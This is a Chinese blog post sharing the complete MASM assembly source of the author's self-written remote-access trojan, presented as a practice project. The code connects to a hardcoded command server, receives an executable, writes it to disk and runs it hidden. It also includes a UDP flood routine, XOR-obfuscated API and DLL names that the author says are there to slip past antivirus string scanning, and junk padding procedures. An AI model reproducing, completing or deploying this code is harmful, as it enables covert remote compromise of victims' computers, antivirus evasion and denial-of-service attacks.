自己前几天用MASM写的一个远控

发布于 2014-11-21  876 次阅读


最先是在看雪发的 新开空间我也没啥东西 只能拿这个凑数了
;作者:落笔飞花笑百生
;日期:2014/12/20
;用处:练手
;写一个程序虽然很烂但是确实能学到很多,用汇编写程序能逼迫自己去学习以前高级语言中容易忽略的东西虽然还是不够。
;但是至少脱离了只能用别人封装好的库来写程序的恶性循环
;这个程序也没有了写下去的意思,该解决的都解决了我实在想不出来再写他具体能得到什么
;本来想把自己实现的getFUNCaddress加进去的,也没有这样做。
;DLL名称和函数名称由于直接这样写会被某些弱智杀软杀字符串没办法只能xor简单加密一下然后取地址再动态解密一下 这样过了表面
;二次开发的人注意:xor第一个字符不加密的

include androidprotect.inc
.code
dipx byte "192.168.0.101",0
;dipx byte "anyou5.com",0
ganraoz proc
ret

ganraoz endp
_CalcCheckSum proc _lpsz,_dwSize

local @dwSize

pushad

mov ecx,_dwSize

shr ecx,1

xor ebx,ebx

mov esi,_lpsz

;********************************************************************

; 数据包校验和为每 16 位累加

;********************************************************************

cld

@@:

lodsw

movzx eax,ax

add ebx,eax

loop @B

;********************************************************************

; 最后如果有单 8 位则继续累加

;********************************************************************

test _dwSize,1

jz @F

lodsb

movzx eax,al

add ebx,eax

@@:

;********************************************************************

; 将高 16 位并入低 16 位后取反输出

;********************************************************************

mov eax,ebx

and eax,0ffffh

shr ebx,16

add eax,ebx

not ax

mov @dwSize,eax

popad

mov eax,@dwSize

ret

_CalcCheckSum endp
udpattack proc
invoke m_socket,AF_INET, SOCK_DGRAM, 17
mov udpsock,eax
mov udpSin.sin_family, AF_INET
invoke gethtons,udpport
mov udpSin.sin_port,ax
invoke m_gethostbyname,offset udpip
mov eax,[eax+12] mov eax,[eax] mov eax,[eax] invoke m_inet_ntoa,eax
invoke m_inet_addr,eax
mov udpSin.sin_addr.S_un.S_addr,eax
invoke m_setsockopt,udpsock,SOL_SOCKET,SO_SNDBUF,offset udpbuf,sizeof udpbuf
.while byte ptr [uptrue]==1
invoke GetTickCount
invoke dwtoa,eax,offset udpbuff
invoke lstrlen,offset udpbuff
invoke m_sendto,udpsock,offset udpbuff,eax,0,offset udpSin,sizeof udpSin
.endw
invoke m_closesocket,udpsock
ret

udpattack endp

stringtodw proc string:dword,strsiz:dword
;日期:2014/12/23
;用处:字符串数字无差转换成DWORD
;作者:落笔飞花笑百生
xor eax,eax
mov edi,string
xor ebx ,ebx
xor esi,esi

mov ecx,strsiz

fuckmm:
MOVZX ESI,BYTE PTR DS:[EDI] cmp esi,0
je close
LEA EAX,DWORD PTR DS:[EBX+EBX*4] LEA EBX,DWORD PTR DS:[ESI+EAX*2-30h] INC EDI
loop fuckmm
close:
mov eax,ebx
ret 8
stringtodw endp
xorstring proc dstring,dsize:dword
;解密字符串
mov eax,dstring
mov ecx,dsize
@@:
inc eax
xor byte ptr [eax],5

loop @B

ret
xorstring endp
gethtons proc port :dword
;转换端口

mov eax,dword ptr ss:[ebp+8] movzx ecx,ax
movzx eax,cl
shl eax,8
shr ecx ,8
or eax,ecx
ret

gethtons endp

midstr proc a,b,cc,d:dword
;截取字符串
push esi
push edi

xor eax,eax
xor ebx,ebx
mov eax,d
mov ebx,cc
sub eax,ebx
mov ecx,eax
cld
mov esi,a
add esi ,cc
mov edi,b
rep movsb
pop esi
pop edi
ret

midstr endp
ganraoy proc

ret

ganraoy endp

start proc
;入口
invoke GetCommandLine
call $+5
call $+5
call $+5

jmp xaxa
xaxa:
call getproaddress
invoke m_WSAStartup,0202h,offset WSAData
.repeat
invoke m_socket,AF_INET, SOCK_STREAM, IPPROTO_TCP
.if eax!=INVALID_SOCKET

mov hSock,eax
mov Sin.sin_family, AF_INET
invoke gethtons,dport
mov Sin.sin_port,ax
invoke m_gethostbyname,offset dipx
mov eax,[eax+12] mov eax,[eax] mov eax,[eax] invoke m_inet_ntoa,eax
invoke m_inet_addr,eax
mov Sin.sin_addr.S_un.S_addr,eax
invoke m_connect,hSock,addr Sin,sizeof Sin

.endif
recvloop:
invoke RtlZeroMemory,offset flag,sizeof flag
invoke RtlZeroMemory,offset recvbuff,sizeof recvbuff
invoke m_recv,hSock,offset recvbuff,sizeof recvbuff,0
.while eax>0 &&eax!=INVALID_SOCKET &&eax!=SOCKET_ERROR
invoke midstr,offset recvbuff,offset flag,0,2
invoke lstrcmpi,offset flag,offset xz
cmp eax,0
je xxz
invoke midstr,offset recvbuff,offset flag,0,2
invoke lstrcmpi,offset flag,offset pe
cmp eax,0
je fuckfile
jmp recvloop
;写出PE文件
fuckfile:
invoke GetCurrentDirectory,260,offset currd
invoke GetTickCount
invoke dwtoa,eax,offset filename
invoke lstrcat ,offset filename,$CTA0(".exe")
invoke lstrcat,offset currd,offset xiegang
invoke lstrcat,offset currd,offset filename
;处理要写出的文件名字和路径
invoke DeleteFile,offset currd
;会以MZ开头的
invoke CreateFile,addr currd,GENERIC_WRITE,FILE_SHARE_WRITE,NULL,CREATE_ALWAYS,FILE_ATTRIBUTE_NORMAL,NULL
mov hfilehandle,eax
invoke WriteFile,hfilehandle,offset recvbuff,sizeof recvbuff,offset oldwritebytes,NULL
loopwrite:
invoke RtlZeroMemory,offset recvbuff,sizeof recvbuff
invoke m_recv,hSock,offset recvbuff,sizeof recvbuff,0
invoke SetFilePointer,hfilehandle,NULL,NULL,FILE_END
invoke WriteFile,hfilehandle,offset recvbuff,sizeof recvbuff,offset oldwritebytes,NULL
invoke GetFileSize,hfilehandle,NULL
mov writebytes,eax
cmp eax,dword ptr [dFileSize] je close
jmp loopwrite

close:
invoke CloseHandle,hfilehandle
mov dword ptr [dFileSize],0;大小清空
invoke RtlZeroMemory,offset recvbuff,sizeof recvbuff
invoke WinExec,offset currd,SW_HIDE;传输完毕后执行!
invoke m_send,hSock,offset filecs,sizeof filecs,0
jmp recvloop;
xxz:
invoke lstrlen,offset recvbuff
invoke midstr,offset recvbuff,offset dFileSize,2,eax
invoke lstrlen,offset dFileSize
invoke stringtodw,offset dFileSize,eax
mov dword ptr [dFileSize],eax
invoke m_send,hSock,offset getpe,sizeof getpe,0
jmp recvloop
.endw

invoke m_closesocket,hSock
invoke Sleep,10000
.until CLOSE==TRUE
invoke m_WSACleanup

start endp
winmain proc
invoke CreateThread,NULL,NULL,offset start,NULL,0,NULL;开启小马线程
ret

winmain endp
dwtoa proc dwValue:DWORD, lpBuffer:DWORD
;整数转换为字符串

nop
nop
nop
nop
nop
nop
nop
nop

push ebx
push esi
push edi

mov eax, dwValue
mov edi, [lpBuffer]

or eax,eax
jnz sign

zero:
mov word ptr [edi],30h
jmp dw2asc

sign:
jns pos
mov byte ptr [edi],'-'
neg eax
inc edi

pos:
mov ecx,429496730
mov esi, edi

.while (eax > 0)
mov ebx,eax
mul ecx
mov eax,edx
lea edx,[edx*4+edx] add edx,edx
sub ebx,edx
add bl,'0'
mov [edi],bl
inc edi
.endw

mov byte ptr [edi], 0 ; terminate the string

; We now have all the digits, but in reverse order.

.while (esi < edi) dec edi mov al, [esi] mov ah, [edi] mov [edi], al mov [esi], ah inc esi .endw dw2asc: pop edi pop esi pop ebx ret dwtoa endp ganraox proc push eax push eax pop eax pop eax mov eax,eax ret ganraox endp ganraoxx proc push eax push eax pop eax pop eax mov eax,eax ret ganraoxx endp getproaddress proc ;获取API地址 invoke xorstring,offset ws32dll,sizeof ws32dll invoke xorstring,offset wstp,sizeof wstp invoke xorstring,offset sock,sizeof sock invoke xorstring,offset getby,sizeof getby invoke xorstring,offset inoa,sizeof inoa invoke xorstring,offset inaddr,sizeof inaddr invoke xorstring,offset cont,sizeof cont invoke xorstring,offset recvx,sizeof recvx invoke xorstring,offset colses,sizeof colses invoke xorstring,offset wcl,sizeof wcl invoke xorstring,offset sed,sizeof sed invoke xorstring,offset sot,sizeof sot invoke xorstring,offset sendtot,sizeof sendtot ;上面的CALL是解密字符串 invoke CreateMutex,NULL,NULL,$TA0("bixanhuxakai") mov mxhand,eax invoke GetLastError .if eax== ERROR_ALREADY_EXISTS invoke CloseHandle,offset mxhand mov mxhand,0 invoke ExitProcess,NULL .endif invoke LoadLibrary,offset ws32dll invoke GetProcAddress,eax,offset wstp mov m_WSAStartup,eax invoke LoadLibrary,offset ws32dll invoke GetProcAddress,eax,offset sock mov m_socket,eax invoke LoadLibrary,offset ws32dll invoke GetProcAddress,eax,offset getby mov m_gethostbyname,eax invoke LoadLibrary,offset ws32dll invoke GetProcAddress,eax,offset inoa mov m_inet_ntoa,eax invoke LoadLibrary,offset ws32dll invoke GetProcAddress,eax,offset inaddr mov m_inet_addr,eax invoke LoadLibrary,offset ws32dll invoke GetProcAddress,eax,offset cont mov m_connect,eax invoke LoadLibrary,offset ws32dll invoke GetProcAddress,eax,offset recvx mov m_recv,eax invoke LoadLibrary,offset ws32dll invoke GetProcAddress,eax,offset colses mov m_closesocket,eax invoke LoadLibrary,offset ws32dll invoke GetProcAddress,eax,offset wcl mov m_WSACleanup,eax invoke LoadLibrary,offset ws32dll invoke GetProcAddress,eax,offset sed mov m_send,eax invoke LoadLibrary,offset ws32dll invoke GetProcAddress,eax,offset sendtot mov m_sendto,eax invoke LoadLibrary,offset ws32dll invoke GetProcAddress,eax,offset sot mov m_setsockopt,eax ret getproaddress endp ganrao proc ret ganrao endp end winmain 下面是INC文件 .386 .model flat,stdcall option casemap:none include windows.inc include user32.inc includelib user32.lib include kernel32.inc includelib kernel32.lib include C:\Users\巫师\Desktop\RadASM\masm32\macros\Strings.mac _WSAStartup2 typedef proto :dword,:dword _WSAStartup typedef ptr _WSAStartup2 _socket2 typedef proto :dword,:dword,:dword _socket typedef ptr _socket2 _gethostbyname2 typedef proto :dword _gethostbyname typedef ptr _gethostbyname2 _inet_ntoa2 typedef proto :dword _inet_ntoa typedef ptr _inet_ntoa2 _inet_addr2 typedef proto :dword _inet_addr typedef ptr _inet_addr2 _connect2 typedef proto :dword,:dword,:dword _connect typedef ptr _connect2 _recv2 typedef proto :dword,:dword,:dword,:dword _recv typedef ptr _recv2 _closesocket2 typedef proto :dword _closesocket typedef ptr _closesocket2 _WSACleanup2 typedef proto _WSACleanup typedef ptr _WSACleanup2 _send2 typedef proto :dword,:dword,:dword,:dword _send typedef ptr _send2 _sendto2 typedef proto :dword,:dword,:dword,:dword,:dword,:dword _sendto typedef ptr _sendto2 _setsockopt2 typedef proto :dword,:dword,:dword,:dword,:dword _setsockopt typedef ptr _setsockopt2 getproaddress proto dwtoa proto :dword,:dword gethtons proto:dword .data? currd byte 260 dup (?) filename byte 50 dup (?) ipsize byte 50 dup (?) recvbuff byte 1024 dup (?);1kb的缓存 Sin sockaddr_in <>
;UDP
udpSin sockaddr_in <>
udpbuff byte 200 dup(?)
udpbuf dd 00
udpport dd 00
udpip byte 50 dup (?)
udpsock dd 00
uptrue byte 01h
;UDP
WSAData WSADATA <>
m_WSAStartup _WSAStartup ?
m_socket _socket ?
m_gethostbyname _gethostbyname ?
m_inet_addr _inet_addr ?
m_inet_ntoa _inet_ntoa ?
m_connect _connect ?
m_recv _recv ?
m_closesocket _closesocket ?
m_WSACleanup _WSACleanup ?
m_send _send ?
m_setsockopt _setsockopt ?
m_sendto _sendto ?
.data
hfilehandle dd 00
writebytes dd 00
oldwritebytes dd 00
dFileSize dd 00
mxhand dd 00
xz byte "XZ",0
pe byte "MZ",0
flag byte 5 dup (?)
dport dword 666
CLOSE BOOL FALSE
filecs byte "FILECSWB!",0
getpe byte "GETPE!",0
xiegang byte "\",0
hSock dd 00
datalengh dd 00
ws32dll byte 077h, 076h, 037h, 05Ah, 036h, 037h, 02Bh, 061h, 069h, 069h, 0005h
xa byte 00,00
wstp byte 0057h ,0056h ,0044h ,0056h ,0071h, 0064h ,0077h ,0071h ,0070h ,0075h ,0005h
xb byte 00,00
sock byte 073h ,06Ah ,066h ,06Eh ,060h ,0071h ,005h
xc byte 00,00
getby byte 0067h ,0060h ,0071h ,006Dh ,006Ah ,0076h ,0071h ,0067h ,007Ch ,006Bh ,0064h ,068h ,060h ,005h

xd byte 00,00
inoa byte 0069h ,006Bh ,0060h ,0071h ,005Ah ,006Bh ,0071h ,006Ah ,0064h ,005h

xe byte 00,00
inaddr byte 0069h, 006Bh, 0060h ,0071h, 005Ah, 0064h ,0061h, 0061h, 0077h, 0005h

xf byte 00,00
cont byte 0063h ,006Ah ,006Bh ,006Bh, 0060h, 0066h, 0071h ,0005h

xg byte 00,00
recvx byte 0072h ,0060h ,0066h ,0073h ,0005h

xh byte 00,00
colses byte 0063h ,0069h ,006Ah ,0076h ,0060h ,0076h, 006Ah, 0066h ,006Eh ,0060h ,0071h ,0005h

xi byte 00,00
wcl byte 0057h, 0056h ,0044h, 0046h, 0069h ,060h ,0064h ,006Bh ,0070h ,0075h ,0005h

xj byte 00,00
sed byte 0073h, 0060h, 006Bh, 0061h, 0005h

xk byte 00,00
sot byte 073h,060h,071h,076h,06Ah,066h,06Eh,06Ah,075h,071h,005h
xl byte 00,00
sendtot byte 073h,060h,06Bh,061h,071h,06Ah,005h
xm byte 00,00

本站文章基于国际协议BY-NA-SA 4.0协议共享;
如未特殊说明,本站文章皆为原创文章,请规范转载。

0

博客管理员